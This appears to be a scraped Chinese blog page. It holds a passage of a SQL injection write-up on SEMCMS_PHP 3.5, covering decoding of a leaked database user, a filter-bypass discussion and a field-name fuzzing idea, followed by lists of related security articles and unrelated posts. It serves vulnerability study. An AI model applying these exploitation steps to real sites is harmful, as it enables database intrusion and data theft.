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" alt="" />

  解码ascii hex值0x726F6F74406C6F63616C686F7374为root@localhost。当然因为过滤了select,获取表名就有点困难了,t00ls中看到有人介绍用selselectect来绕过的方式跟这个CMS的过滤方式是不一样的,所以行不通。暂时想到的办法是可以找一与验证密码有关的注点,因为这个注点包含表名,所以可以通过fuzz猜测其字段名,最后通过字段名取得字段值,可以看下这篇文章blind-sql-injection-burpsuite-like-a-boss(要翻墙)

  文章参考地址:http://www.secist.com/archives/5990.html

最新版SEMCMS_PHP_3.5 过滤不严导致sql注入的更多相关文章

  1. ASP.NET MVC 5使用Filter过滤Action参数防止sql注入,让你代码安全简洁

    在开发程序的过程中,稍微不注意就会隐含有sql注入的危险.今天我就来说下,ASP.NET mvc 5使用Filter过滤Action参数防止sql注入,让你代码安全简洁.不用每下地方对参数的值都进行检 ...

  2. AOP实践—ASP.NET MVC5 使用Filter过滤Action参数防止sql注入,让你代码安全简洁

    在开发程序的过程中,稍微不注意就会隐含有sql注入的危险.今天我就来说下,ASP.NET mvc 5使用Filter过滤Action参数防止sql注入,让你代码安全简洁.不用每下地方对参数的值都进行检 ...

  3. dedecms SESSION变量覆盖导致SQL注入漏洞修补方案

    dedecms的/plus/advancedsearch.php中,直接从$_SESSION[$sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_st ...

  4. 高版本正方教务系统上传后缀过滤不严导致能直接上传Webshell

    在旧版本中有一个利用插件上传文件的漏洞,但是在新版本中已经没有了这个插件.这个漏洞是由于过滤不严造成的,可以直接上传Webshell进行提权,由于代码在DLL中,全国大部分高校均有此漏洞,影响范围很大 ...

  5. Drupal V7.3.1 框架处理不当导致SQL注入

    这个漏洞本是2014年时候被人发现的,本着学习的目的,我来做个详细的分析.漏洞虽然很早了,新版的Drupal甚至已经改变了框架的组织方式.但是丝毫不影响对于漏洞的分析.这是一个经典的使用PDO,但是处 ...

  6. 过滤xss攻击和sql注入函数

    /**+----------------------------------------------------------* The goal of this function is to be a ...

  7. 浅析php过滤html字符串,防止SQL注入的方法

    批量过滤post,get敏感数据 复制代码 代码如下: $_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST); 数 ...

  8. php过滤提交数据 防止sql注入攻击

    规则 1:绝不要信任外部数据或输入 关于 Web 应用程序安全性,必须认识到的第一件事是不应该信任外部数据.外部数据(outside data) 包括不是由程序员在 PHP 代码中直接输入的任何数据. ...

  9. DM企业建站系统v201710 sql注入漏洞分析 | 新版v201712依旧存在sql注入

    0x00 前言 本来呢,这套CMS都不想审的了.下载下来打开一看,各种debug注释,排版烂的不行. 贴几个页面看看 感觉像是新手练手的,没有审下去的欲望了. 但想了想,我tm就是新手啊,然后就继续看 ...

随机推荐

  1. 如何减少JS的全局变量污染

    A,唯一变量 B,闭包

  2. GMF Q&amp;A(1): 如何让palette支持拖拽(DnD)等10则

    1,如何让palette支持拖拽(DnD) 在*PaletteFactory类中,把私有类NodeToolEntry 和LinkToolEntry的基类修改为PaletteToolEntry.并在构造 ...

  3. HDU 3333 Turing Tree (树状数组)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=3333 题意就是询问区间不同数字的和. 比较经典的树状数组应用. //#pragma comment(l ...

  4. Codeforces Gym 100338C C - Important Roads tarjan

    C - Important RoadsTime Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://acm.hust.edu.cn/vjudge/contes ...

  5. Unity3D中如何计算场景中的三角面和顶点数

    在做游戏开发时,场景中的三角面和顶点数影响着运行效率,尤其是在手机平台上,实时的知道场景中的各项指标,对性能优化来说至关重要,下面我们来实现一个小功能,来实时计算场景中的三角面和顶点数: 如果要知道场 ...

  6. java基础(十五章)

    一.字符串类String 1.String是一个类,位于java.lang包中 2.创建一个字符串对象的2种方式: String 变量名="值"; String 对象名=new S ...

  7. 京东口红top 30分析

    一.抓取商品id 分析网页源码,发现所有id都是在class="gl-item"的标签里,可以利用bs4的select方法查找标签,获取id: 获取id后,分析商品页面可知道每个商 ...

  8. QT中几个函数的使用方法

    一.把字符串转换成整形demo1:QString str = "FF";bool ok;int hex = str.toInt(&ok, 16); // hex == 25 ...

  9. 聚类——WKFCM的matlab程序

    聚类——WKFCM的matlab程序 作者:凯鲁嘎吉 - 博客园 http://www.cnblogs.com/kailugaji/ 在聚类——WKFCM文章中已介绍了WKFCM算法的理论知识,现在用 ...

  10. java内存区域之程序计数器

    程序计数器(program counter register) 作用:字节码解释其工作时,通过这个计数器的值的改变,来选取下一条执行的字节码命令. 由于java虚拟机的都线程是通过线程轮流切换,并分配 ...